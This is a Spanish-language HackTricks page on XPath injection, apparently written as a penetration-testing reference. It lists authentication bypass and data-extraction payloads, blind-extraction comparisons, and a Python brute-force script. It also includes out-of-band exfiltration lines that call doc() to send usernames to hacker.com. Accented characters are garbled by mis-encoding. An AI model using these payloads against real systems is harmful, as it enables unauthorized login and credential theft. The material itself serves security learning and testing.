Inyecci贸n XPATH
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 馃挰 Discord group or the telegram group or follow us on Twitter 馃惁 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Sintaxis B谩sica
Una t茅cnica de ataque conocida como Inyecci贸n XPath se utiliza para aprovechar aplicaciones que forman consultas XPath (Lenguaje de Ruta XML) basadas en la entrada del usuario para consultar o navegar documentos XML.
Nodos Descritos
Las expresiones se utilizan para seleccionar varios nodos en un documento XML. Estas expresiones y sus descripciones se resumen a continuaci贸n:
- nodename: Se seleccionan todos los nodos con el nombre "nodename".
- /: La selecci贸n se realiza desde el nodo ra铆z.
- //: Se seleccionan los nodos que coinciden con la selecci贸n desde el nodo actual, independientemente de su ubicaci贸n en el documento.
- .: Se selecciona el nodo actual.
- ..: Se selecciona el padre del nodo actual.
- @: Se seleccionan los atributos.
Ejemplos de XPath
Ejemplos de expresiones de ruta y sus resultados incluyen:
- bookstore: Se seleccionan todos los nodos llamados "bookstore".
- /bookstore: Se selecciona el elemento ra铆z bookstore. Se observa que una ruta absoluta a un elemento est谩 representada por una ruta que comienza con una barra (/).
- bookstore/book: Se seleccionan todos los elementos book que son hijos de bookstore.
- //book: Se seleccionan todos los elementos book en el documento, independientemente de su ubicaci贸n.
- bookstore//book: Se seleccionan todos los elementos book que son descendientes del elemento bookstore, sin importar su posici贸n bajo el elemento bookstore.
- //@lang: Se seleccionan todos los atributos llamados lang.
Utilizaci贸n de Predicados
Los predicados se utilizan para refinar selecciones:
- /bookstore/book[1]: Se selecciona el primer elemento book hijo del elemento bookstore. Una soluci贸n alternativa para las versiones de IE 5 a 9, que indexan el primer nodo como [0], es establecer el SelectionLanguage en XPath a trav茅s de JavaScript.
- /bookstore/book[last()]: Se selecciona el 煤ltimo elemento book hijo del elemento bookstore.
- /bookstore/book[last()-1]: Se selecciona el pen煤ltimo elemento book hijo del elemento bookstore.
- /bookstore/book[position()<3]: Se seleccionan los dos primeros elementos book hijos del elemento bookstore.
- //title[@lang]: Se seleccionan todos los elementos title con un atributo lang.
- //title[@lang='en']: Se seleccionan todos los elementos title con un valor de atributo "lang" de "en".
- /bookstore/book[price>35.00]: Se seleccionan todos los elementos book de la bookstore con un precio mayor a 35.00.
- /bookstore/book[price>35.00]/title: Se seleccionan todos los elementos title de los elementos book de la bookstore con un precio mayor a 35.00.
Manejo de Nodos Desconocidos
Se emplean comodines para hacer coincidir nodos desconocidos:
- *: Coincide con cualquier nodo de elemento.
- @*: Coincide con cualquier nodo de atributo.
- node(): Coincide con cualquier nodo de cualquier tipo.
M谩s ejemplos incluyen:
- /bookstore/*: Selecciona todos los nodos de elementos hijos del elemento bookstore.
- //*: Selecciona todos los elementos en el documento.
- //title[@*]: Selecciona todos los elementos title con al menos un atributo de cualquier tipo.
Ejemplo
<?xml version="1.0" encoding="ISO-8859-1"?>
<data>
<user>
<name>pepe</name>
<password>peponcio</password>
<account>admin</account>
</user>
<user>
<name>mark</name>
<password>m12345</password>
<account>regular</account>
</user>
<user>
<name>fino</name>
<password>fino2</password>
<account>regular</account>
</user>
</data>
Acceder a la informaci贸n
All names - [pepe, mark, fino]
name
//name
//name/node()
//name/child::node()
user/name
user//name
/user/name
//user/name
All values - [pepe, peponcio, admin, mark, ...]
//user/node()
//user/child::node()
Positions
//user[position()=1]/name #pepe
//user[last()-1]/name #mark
//user[position()=1]/child::node()[position()=2] #peponcio (password)
Functions
count(//user/node()) #3*3 = 9 (count all values)
string-length(//user[position()=1]/child::node()[position()=1]) #Length of "pepe" = 4
substrig(//user[position()=2/child::node()[position()=1],2,1) #Substring of mark: pos=2,length=1 --> "a"
Identificar y robar el esquema
and count(/*) = 1 #root
and count(/*[1]/*) = 2 #count(root) = 2 (a,c)
and count(/*[1]/*[1]/*) = 1 #count(a) = 1 (b)
and count(/*[1]/*[1]/*[1]/*) = 0 #count(b) = 0
and count(/*[1]/*[2]/*) = 3 #count(c) = 3 (d,e,f)
and count(/*[1]/*[2]/*[1]/*) = 0 #count(d) = 0
and count(/*[1]/*[2]/*[2]/*) = 0 #count(e) = 0
and count(/*[1]/*[2]/*[3]/*) = 1 #count(f) = 1 (g)
and count(/*[1]/*[2]/*[3]/[1]*) = 0 #count(g) = 0
#The previous solutions are the representation of a schema like the following
#(at this stage we don't know the name of the tags, but jus the schema)
<root>
<a>
<b></b>
</a>
<c>
<d></d>
<e></e>
<f>
<h></h>
</f>
</c>
</root>
and name(/*[1]) = "root" #Confirm the name of the first tag is "root"
and substring(name(/*[1]/*[1]),1,1) = "a" #First char of name of tag `<a>` is "a"
and string-to-codepoints(substring(name(/*[1]/*[1]/*),1,1)) = 105 #Firts char of tag `<b>`is codepoint 105 ("i") (https://codepoints.net/)
#Stealing the schema via OOB
doc(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
doc-available(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
Bypass de Autenticaci贸n
Ejemplo de consultas:
string(//user[name/text()='+VAR_USER+' and password/text()='+VAR_PASSWD+']/account/text())
$q = '/usuarios/usuario[cuenta="' . $_POST['user'] . '" and passwd="' . $_POST['passwd'] . '"]';
OR eludir en usuario y contrase帽a (mismo valor en ambos)
' or '1'='1
" or "1"="1
' or ''='
" or ""="
string(//user[name/text()='' or '1'='1' and password/text()='' or '1'='1']/account/text())
Select account
Select the account using the username and use one of the previous values in the password field
Abusando de la inyecci贸n nula
Username: ' or 1]%00
Doble OR en el nombre de usuario o en la contrase帽a (es v谩lido con solo 1 campo vulnerable)
IMPORTANTE: Tenga en cuenta que la "y" es la primera operaci贸n realizada.
Bypass with first match
(This requests are also valid without spaces)
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
string(//user[name/text()='' or true() or '' and password/text()='']/account/text())
Select account
'or string-length(name(.))<10 or' #Select account with length(name)<10
'or contains(name,'adm') or' #Select first account having "adm" in the name
'or contains(.,'adm') or' #Select first account having "adm" in the current value
'or position()=2 or' #Select 2潞 account
string(//user[name/text()=''or position()=2 or'' and password/text()='']/account/text())
Select account (name known)
admin' or '
admin' or '1'='2
string(//user[name/text()='admin' or '1'='2' and password/text()='']/account/text())
Extracci贸n de cadenas
La salida contiene cadenas y el usuario puede manipular los valores para buscar:
/user/username[contains(., '+VALUE+')]
') or 1=1 or (' #Get all names
') or 1=1] | //user/password[('')=(' #Get all names and passwords
') or 2=1] | //user/node()[('')=(' #Get all values
')] | //./node()[('')=(' #Get all values
')] | //node()[('')=(' #Get all values
') or 1=1] | //user/password[('')=(' #Get all names and passwords
')] | //password%00 #All names and passwords (abusing null injection)
')]/../*[3][text()!=(' #All the passwords
')] | //user/*[1] | a[(' #The ID of all users
')] | //user/*[2] | a[(' #The name of all users
')] | //user/*[3] | a[(' #The password of all users
')] | //user/*[4] | a[(' #The account of all users
Explotaci贸n Ciega
Obtener la longitud de un valor y extraerlo mediante comparaciones:
' or string-length(//user[position()=1]/child::node()[position()=1])=4 or ''=' #True if length equals 4
' or substring((//user[position()=1]/child::node()[position()=1]),1,1)="a" or ''=' #True is first equals "a"
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
... and ( if ( $employee/role = 2 ) then error() else 0 )... #When error() is executed it rises an error and never returns a value
Ejemplo de Python
import requests, string
flag = ""
l = 0
alphabet = string.ascii_letters + string.digits + "{}_()"
for i in range(30):
r = requests.get("http://example.com?action=user&userid=2 and string-length(password)=" + str(i))
if ("TRUE_COND" in r.text):
l = i
break
print("[+] Password length: " + str(l))
for i in range(1, l + 1): #print("[i] Looking for char number " + str(i))
for al in alphabet:
r = requests.get("http://example.com?action=user&userid=2 and substring(password,"+str(i)+",1)="+al)
if ("TRUE_COND" in r.text):
flag += al
print("[+] Flag: " + flag)
break
Leer archivo
(substring((doc('file://protected/secret.xml')/*[1]/*[1]/text()[1]),3,1))) < 127
Explotaci贸n OOB
doc(concat("http://hacker.com/oob/", RESULTS))
doc(concat("http://hacker.com/oob/", /Employees/Employee[1]/username))
doc(concat("http://hacker.com/oob/", encode-for-uri(/Employees/Employee[1]/username)))
#Instead of doc() you can use the function doc-available
doc-available(concat("http://hacker.com/oob/", RESULTS))
#the doc available will respond true or false depending if the doc exists,
#user not(doc-available(...)) to invert the result if you need to
Herramienta autom谩tica
Referencias
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection
- https://wiki.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010)
- https://www.w3schools.com/xml/xpath_syntax.asp
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 馃挰 Discord group or the telegram group or follow us on Twitter 馃惁 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.